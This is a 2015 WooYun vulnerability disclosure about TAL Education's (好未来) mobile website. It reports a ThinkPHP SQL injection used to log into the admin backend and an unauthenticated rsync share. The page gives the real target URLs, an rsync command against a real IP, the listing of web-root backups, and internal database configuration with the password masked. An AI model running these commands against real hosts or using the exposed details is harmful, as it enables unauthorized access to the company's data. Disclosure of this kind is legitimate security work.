当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099954

漏洞标题:好未来集团官网存在sql注入(已进入后台管理)+未授权访问

相关厂商:好未来集团学而思培优

漏洞作者: 啊L川

提交时间:2015-03-09 18:27

修复时间:2015-04-23 18:28

公开时间:2015-04-23 18:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向核心白帽子及相关领域专家公开
2015-03-30: 细节向普通白帽子公开
2015-04-09: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

由于CMS管理系统使用TP框架,没有打补丁导致sql注入

详细说明:

好未来官方主站 (移动官网)使用了ThinkPHP框架
在测试中,发现没有打补丁。导致通过sql注入,构造任意用户登录
移动官网地址 http://m.100tal.com/
登录地址 http://m.100tal.com/Admin/Login/index.html
登录请求 http://m.100tal.com/Admin/Login/login
构造登录请求

QQ20150306-3@2x.jpg


登录进后台,

QQ20150306-4@2x.jpg


发现网站存在rsync 未授权访问: 搜索了下有人提过了,但是还看不到详情,
应该是重复了,,
rsync 115.182.69.234::webroot/

➜ /Users/0ks3iio >rsync 115.182.69.234::webroot/
drwxr-xr-x        4096 2014/11/18 10:33:17 .
-rw-r--r--   308779209 2014/07/10 13:00:47 homeworkInterface-20140710.tar.gz
-rw-r--r--   308779316 2014/08/05 15:01:16 homeworkInterface-20140805.tar.gz
-rw-r--r--    30488675 2014/11/11 15:44:57 m_100tal_20141111.tar.gz
-rw-r--r--    31469992 2014/11/14 17:49:28 m_100tal_20141114.tar.gz
-rw-r--r--    31776041 2014/11/18 10:33:19 m_100tal_20141118.tar.gz
-rw-r--r--      956546 2014/01/06 16:45:20 xueersi_toupiao_20140106.tar.gz
drwxr-xr-x        4096 2014/05/07 09:50:07 cms_v41
drwxr-xr-x        4096 2014/01/07 16:10:25 default
drwxr-xr-x        4096 2012/06/05 16:57:36 eduu_awstats
drwxr-xr-x        4096 2012/02/02 16:39:43 exam1.0
drwxr-xr-x        4096 2012/07/11 13:39:53 ftp
drwxr-xr-x        4096 2014/08/05 15:03:57 homeworkInterface
drwxr-xr-x        4096 2014/10/24 10:24:53 html
drwxr-xr-x        4096 2012/02/02 16:40:22 kaoshi
drwx------       16384 2014/06/30 15:34:23 lost+found
drwxr-xr-x        4096 2015/03/06 22:49:23 m_100tal
drwxr-xr-x        4096 2014/01/10 11:07:57 sumlog
drwxr-xr-x        4096 2012/07/17 16:14:41 xueersi_toupiao


drwxr-xr-x        4096 2015/03/06 22:49:23 .
-rw-r--r--         177 2014/10/19 19:32:58 .htaccess
-rw-r--r--        3371 2015/02/23 19:55:29 15_02_23.log
-rw-r--r--         245 2015/03/06 22:49:23 15_03_06.log
-rw-r--r--         203 2014/11/11 15:22:10 index.php
-rw-r--r--     7926609 2014/10/26 14:05:26 saf.zip
drwxr-xr-x        4096 2014/11/11 15:23:57 ThinkPHP
drwxr-xr-x        4096 2014/10/12 18:22:06 app


config.php

'DB_TYPE'		=>	'mysql',
	'DB_HOST'		=>	'10.10.10.41',
	'DB_NAME'		=>	'100talwgw',
	'DB_USER'		=>	'Tal',
	'DB_PWD'		=>	'*****',
	'DB_PORT'		=>	'3309',
	'DB_PREFIX'		=>	'tb_',
	'DB_CHARSET' => 'utf8',

漏洞证明:

修复方案:

求20rank 挖洞不易!

版权声明:转载请注明来源 啊L川@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-10 09:58

厂商回复:

谢谢支持

最新状态:

暂无